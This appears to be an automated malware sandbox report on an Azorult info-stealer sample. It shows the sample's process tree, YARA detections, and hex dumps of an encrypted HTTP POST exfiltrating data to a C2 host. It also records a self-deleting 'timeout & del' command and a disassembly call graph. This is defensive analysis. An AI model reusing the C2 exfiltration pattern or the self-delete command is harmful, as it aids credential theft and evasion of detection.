                                Data Ascii: e0:3TddeIh2>[tg26heg0NRgbd-2=hVqc6IVgiU1i1fVD6)1Ncfa:TXftap/I0eg213ogp}43TfU9MYgg`3:Re3a2QE`e0#U[=20bavUoWexVy
                                Aug 29, 2024 22:46:59.502345085 CEST672INData Raw: 38 f9 39 7b 22 48 5b 2c 0c 69 c6 62 5f b7 ea d1 7a cf 39 52 39 d1 90 9c 48 31 e4 a1 95 df 42 d8 22 21 8c 4c 5c 5e 4c ac da 73 4e 38 35 b1 01 d1 10 e7 70 f4 3d 5b 41 79 cd bd 35 aa 79 11 46 21 d5 73 a1 54 2a 5d d3 90 0c f1 66 57 ae 7f c0 70 e6 31
                                Data Ascii: 89{"H[,ib_z9R9H1B"!L\^LsN85p=[Ay5yF!sT*]fWp1_4^kz|djNIlU-WdggFi2,Vkcj2Ucce20b`vc5W3bmgq]37Sua7]l-dz`f:P&
                                Aug 29, 2024 22:46:59.502358913 CEST1236INData Raw: ed 40 5a dd 7d b0 87 5b 13 84 81 e5 9e 61 3c 1b a8 aa 90 d5 f4 ae df e0 37 65 8a 04 0d f5 4a 8d 93 9b 5c 7f 8b 2a 24 5d 4f 7b a7 e1 19 25 ed 51 ac 8d c3 5e 70 37 37 85 33 d0 4d c2 44 76 60 ee 1c 54 74 69 5b 5a 3f d9 70 92 c9 33 9f 02 9c 68 b1 55
                                Data Ascii: @Z}[a<7eJ\*$]O{%Q^p773MDv`Tti[Z?p3hUV.qbjU86SeeU3%PrADwB0[.,bRe3xzJ9WjU30)%T6GMTW)Q2_PSffPH/aV_PUg5W3{F"
                                Aug 29, 2024 22:46:59.502430916 CEST1236INData Raw: 60 9d 7c 7b 49 4d fe 2c e1 79 04 97 20 92 2c 9c 96 02 6b 8d 92 ca b7 3d e9 89 98 d8 e4 a8 d7 39 75 9b 51 5a 5d 31 7f 47 c2 a7 8a 55 be 9f 77 e9 33 93 0a 9c 97 5d 9e 18 31 57 67 66 64 0c 49 31 c0 32 1f ca 69 64 69 60 66 fa d6 23 9f 03 62 cf 36 64
                                Data Ascii: `|{IM,y ,k=9uQZ]1GUw3]1WgfdI12idi`f#b6degdP-=PpbqdT)kUQK&'N,dm`f?2Vtc6IAgb`15]M`d%Pr*4]Tm"*RoMc157XxleE`3Vyc-%rh-p%.GL
                                Aug 29, 2024 22:46:59.502441883 CEST1236INData Raw: 24 9f 49 31 bc 32 90 cd 3a 7e e0 2e e3 58 c6 31 9f 03 98 cb 30 d6 67 69 65 9f 49 31 94 00 1f ca 32 54 f9 c7 09 1e 14 eb d6 90 b7 b7 58 7a 7f 87 d8 4d 28 f5 07 53 be 9b 9e 9a bb 7e 2b 8b c4 de 4f a5 4c 87 9e 20 56 46 74 44 cc e5 ca 97 88 82 a7 4f
                                Data Ascii: $I12:~.X10gieI12TXzM(S~+OL VFtDO$7/;yVLl!<9N\2buJv%1M|4j]?U21NH.#88)Q-wUJz<l"ro0OzcI6n
                                Aug 29, 2024 22:46:59.502453089 CEST1236INData Raw: 9a a1 0e 6b c2 da d0 d0 92 8c 9c 49 fb 90 e5 65 88 69 54 d8 90 a9 57 e4 42 83 fb b2 b9 2a 9f ca 32 64 e7 f6 55 d6 fa 3b ae 0b 9b c8 66 50 60 75 67 fa 98 01 8d 32 8c cd 30 01 62 6e 76 a5 9c 51 ed 6a f4 a5 54 20 09 08 54 bf fb 3e 98 01 c8 cf 34 47
                                Data Ascii: kIeiTWB*2dU;fP`ug20bnvQjT T>4Ga4_fH`e0#OA;spA5#fPeuSmU F%kZ:F5212,C<b3TgU5)QfW)M{kd5Ubg129`gaI=dj`o
                                Aug 29, 2024 22:46:59.507184982 CEST1236INData Raw: 6b 1a 5f f8 ac d0 f7 4a bf 2a b1 15 42 10 59 cf c1 33 4a 08 1f 77 0e fa 19 26 03 6d 08 41 8c b4 2b 71 3b af d7 9f 49 12 d7 04 97 e0 35 55 62 67 e7 98 c9 34 9f 33 1f e9 0a 64 e4 44 50 a9 c2 1a 18 4a 1b 3c 3e 55 61 64 c5 2d e9 16 ae 80 bf e9 31 55
                                Data Ascii: k_J*BY3Jw&mA+q;I5Ubg43dDPJ<>Uad-1UgWj6b21ebg0^Rgbd-2=Vqc6IVgiU1i1fVT6b21ebg0"A>mvvh[kI6^Vf]k3 gffd@affe~.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449731104.21.2.6805180C:\Windows\SysWOW64\svchost.exe
                                TimestampBytes transferredDirectionData
                                Aug 29, 2024 22:47:03.841146946 CEST165OUTPOST /LN341/index.php HTTP/1.1
                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                Host: ln6b9.shop
                                Content-Length: 42517
                                Cache-Control: no-cache
                                Aug 29, 2024 22:47:03.841192007 CEST11124OUTData Raw: 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 67 ef 45 70 9d 33 70 9d 3b 16 8b 30 66 8b 30
                                Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10gEp3p;0f0b1&fB0dEp4)0d0e10eT<g:pp3p2p3p3w0s'p0{p5p7)0m0g0e0e0l0ai:f&&fp3)0e&f&fBg64.b;4g0x4.a66:l6m@`4
                                Aug 29, 2024 22:47:03.846028090 CEST1236OUTData Raw: 50 1a ed 47 1a e8 45 05 e0 4d 1d ff 46 18 eb 42 0d f6 51 1c e0 56 19 e2 53 13 e3 4d 06 ff 56 02 f9 4a 12 eb 49 04 ef 41 12 e1 52 19 e5 4a 0d fa 59 0c e6 4b 04 ff 57 1a f4 5a 19 fa 4d 1f e3 4e 02 eb 4f 0f f4 53 11 e7 47 1d f6 51 17 ed 49 12 f4 56
                                Data Ascii: PGEMFBQVSMVJIARJYKWZMNOSGQIVGNVEDAA[DQGL[JI@MLV@ZYLZSOFVKIEFABQURQPRIF[RI@I@FJUDN
                                Aug 29, 2024 22:47:03.846101999 CEST4944OUTData Raw: 4c 0c fc 5a 01 fe 51 11 fe 40 13 e9 44 1e fb 56 17 f6 5b 06 ea 45 0f eb 49 16 ff 51 1c fc 45 19 ed 4d 18 fe 4e 19 e7 44 00 ed 5a 05 e6 4e 02 f7 55 14 e7 53 14 ef 53 1d fa 52 14 f7 45 06 e4 54 19 fd 40 0f e7 40 1c f6 59 1d f6 4d 1e ef 48 07 e6 49
                                Data Ascii: LZQ@DV[EIQEMNDZNUSSRET@@YMHIMWUMGTKWYLOAFAUMHSS@IMIQBUVZYFAQQJOWRZTUSPTSFSDIAMHYW
                                Aug 29, 2024 22:47:03.846118927 CEST2472OUTData Raw: 4f 17 e7 52 14 e2 50 02 e2 5b 10 f6 42 13 e9 4f 1a f7 4a 13 fc 4e 13 ff 46 0f f8 56 01 e7 48 0d f7 57 05 e4 5a 16 f8 48 16 ff 45 0f f6 46 10 ed 59 1c f6 46 1c e6 52 0f ff 52 0c fa 55 1d e5 42 04 e2 46 1e e3 54 18 f4 59 00 e2 52 0d e0 40 1e e7 49
                                Data Ascii: ORP[BOJNFVHWZHEFYFRRUBFTYR@I@WOUE[JMSYNIINUVMEV[I[EKYVTPUEZDYQZNQKGIYZALKTEVASALM
                                Aug 29, 2024 22:47:03.846154928 CEST2472OUTData Raw: 4b 1d ff 49 05 fd 4b 16 e0 48 07 e2 4a 07 eb 50 00 f6 4f 0f e7 5a 06 f9 47 1d e6 5a 0f f8 51 1e e2 42 12 e8 4f 03 fa 46 1f ff 4b 10 eb 4e 03 fb 56 10 ff 48 04 e3 57 17 ea 5b 13 e9 50 07 e1 59 01 e0 53 19 ed 55 01 eb 46 0f e9 56 00 ed 52 00 eb 48
                                Data Ascii: KIKHJPOZGZQBOFKNVHW[PYSUFVRHRWIQRZBBOFWREFJ[GBPSJAAUSU@[EPSF@[UHLZQ@DV[EIQEMNDZNU
                                Aug 29, 2024 22:47:03.846174002 CEST4944OUTData Raw: 45 13 e8 47 10 eb 4d 0f ef 44 07 e9 55 19 e6 45 10 e2 55 1a fd 44 01 f6 55 1a e1 53 13 e9 40 04 ea 50 13 f9 4c 0c e5 48 1a f7 56 1d e8 54 18 f6 54 05 e2 4b 13 e7 4a 05 e1 51 18 eb 49 1b e1 45 0c e3 49 07 ec 42 0f e2 5a 01 e7 4c 1e eb 45 1c f9 53
                                Data Ascii: EGMDUEUDUS@PLHVTTKJQIEIBZLESVJOAP[RNGAINFMZMQAGTGQIR[@LXSAUUUD(QWUUE<f&1ODV-1`-ODV[VALJ
                                Aug 29, 2024 22:47:03.846211910 CEST4944OUTData Raw: 5a 03 ea 50 0c e0 59 1a e9 40 04 ff 49 17 fe 42 12 e9 42 07 fb 44 16 ff 44 05 fd 5a 18 f8 48 0c e8 46 14 fa 45 01 fb 42 06 fe 45 16 e2 42 0c f8 53 19 fc 40 0d f9 40 1b e7 42 17 ea 47 03 e5 50 13 ec 55 0f e1 54 0f e4 51 0f ed 45 04 f4 4c 0d eb 45
                                Data Ascii: ZPY@IBBDDZHFEBEBS@@BGPUTQELEMSPI@UWITDFMKVK[IAUZIQQGUBNIKHFQ@OBBJZPAGUYAURTASOKEK
                                Aug 29, 2024 22:47:03.846224070 CEST2472OUTData Raw: 46 06 fc 47 13 ec 42 16 fe 4c 01 e0 4e 07 f4 4c 12 f9 4d 05 e0 51 1a e9 59 1d e7 41 0d ef 44 0f e4 46 18 e8 45 0d fc 40 1e a3 09 05 e5 00 51 ba 03 55 ae 03 55 ae 03 55 ae 67 7a 87 6b 57 aa 03 55 ac 07 55 ae 21 55 ae 03 13 c7 6f 30 dd 5f 67 f2 4c
                                Data Ascii: FGBLNLMQYADFE@QUUUgzkWUU!Uo0_gLRZVM@P-1`-M@PARDTSRI[[[@VGFITPNKEZ[KLFTTS[@@INMN@RMJRYL
                                Aug 29, 2024 22:47:03.851092100 CEST4944OUTData Raw: 5b 1b ef 52 01 fd 4e 0c ea 4e 0d f4 5a 0d f7 46 12 fb 4f 00 f6 4c 19 f4 42 19 ed 45 11 f6 40 13 e0 45 1e fe 59 11 e5 42 1b fb 45 00 f6 54 18 fc 4f 17 e7 52 14 e2 50 02 e2 5b 10 f6 42 13 e9 4f 1a f7 4a 13 fc 4e 13 ff 46 0f f8 56 01 e7 48 0d f7 57
                                Data Ascii: [RNNZFOLBE@EYBETORP[BOJNFVHWZHEFYFRRUBFTYR@I@WOUE[JMSYNIINUVMEV[I[EKYVTPUEZDYQZNQ
                                Aug 29, 2024 22:47:03.851113081 CEST2965OUTData Raw: 30 7b 9f 34 62 80 32 64 87 0e 5f e3 6a 36 dc 6c 26 c1 65 21 8e 46 31 c9 66 75 f9 66 37 f8 6a 30 d9 31 75 fc 76 3b da 6a 38 cb 2b 64 9f 34 7b 9e 2d 67 9e 37 60 80 37 62 87 0e 5f e4 62 23 cf 23 14 db 77 3a 8e 56 25 ca 62 21 cb 71 7d 9c 2d 6d 80 30
                                Data Ascii: 0{4b2d_j6l&e!F1fuf7j01uv;j8+d4{-g7`7b_b##w:V%b!q}-m0m-l_b##mV%b!#f2}-e0m3{*XN<q:l3#p ou(~1e6x3g#g<w'a b7fu{c*u#d-f-f6f+d-f-f6f-e_e3`02c@9`>w:Q #w0p<j9w,@:
                                Aug 29, 2024 22:47:07.607481956 CEST625INHTTP/1.1 200 OK
                                Date: Thu, 29 Aug 2024 20:47:07 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Powered-By: PHP/5.6.37
                                Vary: User-Agent
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xj1eMpnI7vchcl4%2Bkg0M8Htt9STehxxSlxjz71wn4WXdCIt7md0P1zLbLZhuWq%2BwWLxXwoyPZrPhANBBgAgj7RxCrBxWXUDRKo9CI4qCWy6gexqGaQ6PMqf%2FqqDa"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8baf64e38d440ced-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7falseOK0


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:16:46:53
                                Start date:29/08/2024
                                Path:C:\Users\user\Desktop\4QihT6CwD8.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\4QihT6CwD8.exe"
                                Imagebase:0x350000
                                File size:1'223'168 bytes
                                MD5 hash:45DA35E12BE2E8A17E6ACF41F682C7F9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:1
                                Start time:16:46:55
                                Start date:29/08/2024
                                Path:C:\Windows\SysWOW64\svchost.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\4QihT6CwD8.exe"
                                Imagebase:0x200000
                                File size:46'504 bytes
                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Azorult_1, Description: Azorult Payload, Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                                • Rule: Azorult, Description: detect Azorult in memory, Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1775229112.0000000005E4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1775016189.0000000004D98000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.1775777338.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:16:47:06
                                Start date:29/08/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:16:47:06
                                Start date:29/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:16:47:06
                                Start date:29/08/2024
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\timeout.exe 3
                                Imagebase:0x9f0000
                                File size:25'088 bytes
                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:3.3%
                                  Dynamic/Decrypted Code Coverage:0.4%
                                  Signature Coverage:4.9%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:50
                                  execution_graph 94736 352e37 94815 35a961 94736->94815 94740 352e6b 94834 353a5a 94740->94834 94742 352e7f 94841 359cb3 94742->94841 94747 352ead 94869 35a8c7 94747->94869 94748 392cb0 94889 3c2cf9 94748->94889 94750 392cc3 94752 392ccf 94750->94752 94915 354f39 94750->94915 94756 354f39 68 API calls 94752->94756 94753 352ec3 94873 356f88 22 API calls 94753->94873 94758 392ce5 94756->94758 94757 352ecf 94759 359cb3 22 API calls 94757->94759 94921 353084 22 API calls 94758->94921 94760 352edc 94759->94760 94874 35a81b 41 API calls 94760->94874 94763 352eec 94765 359cb3 22 API calls 94763->94765 94764 392d02 94922 353084 22 API calls 94764->94922 94767 352f12 94765->94767 94875 35a81b 41 API calls 94767->94875 94768 392d1e 94770 353a5a 24 API calls 94768->94770 94772 392d44 94770->94772 94771 352f21 94775 35a961 22 API calls 94771->94775 94923 353084 22 API calls 94772->94923 94774 392d50 94776 35a8c7 22 API calls 94774->94776 94777 352f3f 94775->94777 94778 392d5e 94776->94778 94876 353084 22 API calls 94777->94876 94924 353084 22 API calls 94778->94924 94781 352f4b 94877 374a28 40 API calls 3 library calls 94781->94877 94782 392d6d 94786 35a8c7 22 API calls 94782->94786 94784 352f59 94784->94758 94785 352f63 94784->94785 94878 374a28 40 API calls 3 library calls 94785->94878 94788 392d83 94786->94788 94925 353084 22 API calls 94788->94925 94789 352f6e 94789->94764 94791 352f78 94789->94791 94879 374a28 40 API calls 3 library calls 94791->94879 94792 392d90 94794 352f83 94794->94768 94795 352f8d 94794->94795 94880 374a28 40 API calls 3 library calls 94795->94880 94797 352f98 94798 352fdc 94797->94798 94881 353084 22 API calls 94797->94881 94798->94782 94799 352fe8 94798->94799 94799->94792 94883 3563eb 22 API calls 94799->94883 94801 352fbf 94804 35a8c7 22 API calls 94801->94804 94803 352ff8 94884 356a50 22 API calls 94803->94884 94806 352fcd 94804->94806 94882 353084 22 API calls 94806->94882 94807 353006 94885 3570b0 23 API calls 94807->94885 94812 353021 94813 353065 94812->94813 94886 356f88 22 API calls 94812->94886 94887 3570b0 23 API calls 94812->94887 94888 353084 22 API calls 94812->94888 94926 36fe0b 94815->94926 94817 35a976 94936 36fddb 94817->94936 94819 352e4d 94820 354ae3 94819->94820 94821 354af0 __wsopen_s 94820->94821 94823 354b22 94821->94823 94964 356b57 94821->94964 94830 354b58 94823->94830 94961 354c6d 94823->94961 94825 359cb3 22 API calls 94827 354c52 94825->94827 94826 359cb3 22 API calls 94826->94830 94829 35515f 22 API calls 94827->94829 94828 354c6d 22 API calls 94828->94830 94832 354c5e 94829->94832 94830->94826 94830->94828 94833 354c29 94830->94833 94976 35515f 94830->94976 94832->94740 94833->94825 94833->94832 94993 391f50 94834->94993 94837 359cb3 22 API calls 94838 353a8d 94837->94838 94995 353aa2 94838->94995 94840 353a97 94840->94742 94842 359cc2 _wcslen 94841->94842 94843 36fe0b 22 API calls 94842->94843 94844 359cea __fread_nolock 94843->94844 94845 36fddb 22 API calls 94844->94845 94846 352e8c 94845->94846 94847 354ecb 94846->94847 95015 354e90 LoadLibraryA 94847->95015 94852 354ef6 LoadLibraryExW 95023 354e59 LoadLibraryA 94852->95023 94853 393ccf 94854 354f39 68 API calls 94853->94854 94856 393cd6 94854->94856 94858 354e59 3 API calls 94856->94858 94860 393cde 94858->94860 95045 3550f5 94860->95045 94861 354f20 94861->94860 94862 354f2c 94861->94862 94864 354f39 68 API calls 94862->94864 94865 352ea5 94864->94865 94865->94747 94865->94748 94868 393d05 94870 35a8ea __fread_nolock 94869->94870 94871 35a8db 94869->94871 94870->94753 94871->94870 94872 36fe0b 22 API calls 94871->94872 94872->94870 94873->94757 94874->94763 94875->94771 94876->94781 94877->94784 94878->94789 94879->94794 94880->94797 94881->94801 94882->94798 94883->94803 94884->94807 94885->94812 94886->94812 94887->94812 94888->94812 94890 3c2d15 94889->94890 94891 35511f 64 API calls 94890->94891 94892 3c2d29 94891->94892 95316 3c2e66 94892->95316 94895 3550f5 40 API calls 94896 3c2d56 94895->94896 94897 3550f5 40 API calls 94896->94897 94898 3c2d66 94897->94898 94899 3550f5 40 API calls 94898->94899 94900 3c2d81 94899->94900 94901 3550f5 40 API calls 94900->94901 94902 3c2d9c 94901->94902 94903 35511f 64 API calls 94902->94903 94904 3c2db3 94903->94904 94905 37ea0c ___std_exception_copy 21 API calls 94904->94905 94906 3c2dba 94905->94906 94907 37ea0c ___std_exception_copy 21 API calls 94906->94907 94908 3c2dc4 94907->94908 94909 3550f5 40 API calls 94908->94909 94910 3c2dd8 94909->94910 94911 3c28fe 27 API calls 94910->94911 94913 3c2dee 94911->94913 94912 3c2d3f 94912->94750 94913->94912 95322 3c22ce 94913->95322 94916 354f43 94915->94916 94917 354f4a 94915->94917 94918 37e678 67 API calls 94916->94918 94919 354f59 94917->94919 94920 354f6a FreeLibrary 94917->94920 94918->94917 94919->94752 94920->94919 94921->94764 94922->94768 94923->94774 94924->94782 94925->94792 94930 36fddb 94926->94930 94928 36fdfa 94928->94817 94930->94928 94933 36fdfc 94930->94933 94946 37ea0c 94930->94946 94953 374ead 7 API calls 2 library calls 94930->94953 94931 37066d 94955 3732a4 RaiseException 94931->94955 94933->94931 94954 3732a4 RaiseException 94933->94954 94935 37068a 94935->94817 94938 36fde0 94936->94938 94937 37ea0c ___std_exception_copy 21 API calls 94937->94938 94938->94937 94939 36fdfa 94938->94939 94941 36fdfc 94938->94941 94958 374ead 7 API calls 2 library calls 94938->94958 94939->94819 94945 37066d 94941->94945 94959 3732a4 RaiseException 94941->94959 94944 37068a 94944->94819 94960 3732a4 RaiseException 94945->94960 94952 383820 _unexpected 94946->94952 94947 38385e 94957 37f2d9 20 API calls _abort 94947->94957 94948 383849 RtlAllocateHeap 94950 38385c 94948->94950 94948->94952 94950->94930 94952->94947 94952->94948 94956 374ead 7 API calls 2 library calls 94952->94956 94953->94930 94954->94931 94955->94935 94956->94952 94957->94950 94958->94938 94959->94945 94960->94944 94982 35aec9 94961->94982 94963 354c78 94963->94823 94965 356b67 _wcslen 94964->94965 94966 394ba1 94964->94966 94969 356ba2 94965->94969 94970 356b7d 94965->94970 94989 3593b2 94966->94989 94968 394baa 94968->94968 94972 36fddb 22 API calls 94969->94972 94988 356f34 22 API calls 94970->94988 94974 356bae 94972->94974 94973 356b85 __fread_nolock 94973->94823 94975 36fe0b 22 API calls 94974->94975 94975->94973 94977 35516e 94976->94977 94981 35518f __fread_nolock 94976->94981 94979 36fe0b 22 API calls 94977->94979 94978 36fddb 22 API calls 94980 3551a2 94978->94980 94979->94981 94980->94830 94981->94978 94983 35aedc 94982->94983 94987 35aed9 __fread_nolock 94982->94987 94984 36fddb 22 API calls 94983->94984 94985 35aee7 94984->94985 94986 36fe0b 22 API calls 94985->94986 94986->94987 94987->94963 94988->94973 94990 3593c9 __fread_nolock 94989->94990 94991 3593c0 94989->94991 94990->94968 94991->94990 94992 35aec9 22 API calls 94991->94992 94992->94990 94994 353a67 GetModuleFileNameW 94993->94994 94994->94837 94996 391f50 __wsopen_s 94995->94996 94997 353aaf GetFullPathNameW 94996->94997 94998 353ace 94997->94998 94999 353ae9 94997->94999 95000 356b57 22 API calls 94998->95000 95009 35a6c3 94999->95009 95002 353ada 95000->95002 95005 3537a0 95002->95005 95006 3537ae 95005->95006 95007 3593b2 22 API calls 95006->95007 95008 3537c2 95007->95008 95008->94840 95010 35a6d0 95009->95010 95011 35a6dd 95009->95011 95010->95002 95012 36fddb 22 API calls 95011->95012 95013 35a6e7 95012->95013 95014 36fe0b 22 API calls 95013->95014 95014->95010 95016 354ec6 95015->95016 95017 354ea8 GetProcAddress 95015->95017 95020 37e5eb 95016->95020 95018 354eb8 95017->95018 95018->95016 95019 354ebf FreeLibrary 95018->95019 95019->95016 95053 37e52a 95020->95053 95022 354eea 95022->94852 95022->94853 95024 354e8d 95023->95024 95025 354e6e GetProcAddress 95023->95025 95028 354f80 95024->95028 95026 354e7e 95025->95026 95026->95024 95027 354e86 FreeLibrary 95026->95027 95027->95024 95029 36fe0b 22 API calls 95028->95029 95030 354f95 95029->95030 95121 355722 95030->95121 95032 354fa1 __fread_nolock 95033 3550a5 95032->95033 95034 393d1d 95032->95034 95044 354fdc 95032->95044 95124 3542a2 CreateStreamOnHGlobal 95033->95124 95135 3c304d 74 API calls 95034->95135 95037 393d22 95039 35511f 64 API calls 95037->95039 95038 3550f5 40 API calls 95038->95044 95040 393d45 95039->95040 95041 3550f5 40 API calls 95040->95041 95043 35506e ISource 95041->95043 95043->94861 95044->95037 95044->95038 95044->95043 95130 35511f 95044->95130 95046 355107 95045->95046 95047 393d70 95045->95047 95157 37e8c4 95046->95157 95050 3c28fe 95299 3c274e 95050->95299 95052 3c2919 95052->94868 95056 37e536 BuildCatchObjectHelperInternal 95053->95056 95054 37e544 95078 37f2d9 20 API calls _abort 95054->95078 95056->95054 95058 37e574 95056->95058 95057 37e549 95079 3827ec 26 API calls pre_c_initialization 95057->95079 95060 37e586 95058->95060 95061 37e579 95058->95061 95070 388061 95060->95070 95080 37f2d9 20 API calls _abort 95061->95080 95064 37e58f 95065 37e595 95064->95065 95066 37e5a2 95064->95066 95081 37f2d9 20 API calls _abort 95065->95081 95082 37e5d4 LeaveCriticalSection __fread_nolock 95066->95082 95069 37e554 __fread_nolock 95069->95022 95071 38806d BuildCatchObjectHelperInternal 95070->95071 95083 382f5e EnterCriticalSection 95071->95083 95073 38807b 95084 3880fb 95073->95084 95077 3880ac __fread_nolock 95077->95064 95078->95057 95079->95069 95080->95069 95081->95069 95082->95069 95083->95073 95091 38811e 95084->95091 95085 388177 95102 384c7d 95085->95102 95090 388189 95096 388088 95090->95096 95115 383405 11 API calls 2 library calls 95090->95115 95091->95085 95091->95091 95091->95096 95100 37918d EnterCriticalSection 95091->95100 95101 3791a1 LeaveCriticalSection 95091->95101 95093 3881a8 95116 37918d EnterCriticalSection 95093->95116 95097 3880b7 95096->95097 95120 382fa6 LeaveCriticalSection 95097->95120 95099 3880be 95099->95077 95100->95091 95101->95091 95107 384c8a _unexpected 95102->95107 95103 384cca 95118 37f2d9 20 API calls _abort 95103->95118 95104 384cb5 RtlAllocateHeap 95105 384cc8 95104->95105 95104->95107 95109 3829c8 95105->95109 95107->95103 95107->95104 95117 374ead 7 API calls 2 library calls 95107->95117 95110 3829fc _free 95109->95110 95111 3829d3 RtlFreeHeap 95109->95111 95110->95090 95111->95110 95112 3829e8 95111->95112 95119 37f2d9 20 API calls _abort 95112->95119 95114 3829ee GetLastError 95114->95110 95115->95093 95116->95096 95117->95107 95118->95105 95119->95114 95120->95099 95122 36fddb 22 API calls 95121->95122 95123 355734 95122->95123 95123->95032 95125 3542bc FindResourceExW 95124->95125 95129 3542d9 95124->95129 95126 3935ba LoadResource 95125->95126 95125->95129 95127 3935cf SizeofResource 95126->95127 95126->95129 95128 3935e3 LockResource 95127->95128 95127->95129 95128->95129 95129->95044 95131 35512e 95130->95131 95134 393d90 95130->95134 95136 37ece3 95131->95136 95135->95037 95139 37eaaa 95136->95139 95138 35513c 95138->95044 95142 37eab6 BuildCatchObjectHelperInternal 95139->95142 95140 37eac2 95152 37f2d9 20 API calls _abort 95140->95152 95142->95140 95143 37eae8 95142->95143 95154 37918d EnterCriticalSection 95143->95154 95144 37eac7 95153 3827ec 26 API calls pre_c_initialization 95144->95153 95147 37eaf4 95155 37ec0a 62 API calls 2 library calls 95147->95155 95149 37eb08 95156 37eb27 LeaveCriticalSection __fread_nolock 95149->95156 95151 37ead2 __fread_nolock 95151->95138 95152->95144 95153->95151 95154->95147 95155->95149 95156->95151 95160 37e8e1 95157->95160 95159 355118 95159->95050 95161 37e8ed BuildCatchObjectHelperInternal 95160->95161 95162 37e925 __fread_nolock 95161->95162 95163 37e900 ___scrt_fastfail 95161->95163 95164 37e92d 95161->95164 95162->95159 95187 37f2d9 20 API calls _abort 95163->95187 95173 37918d EnterCriticalSection 95164->95173 95167 37e937 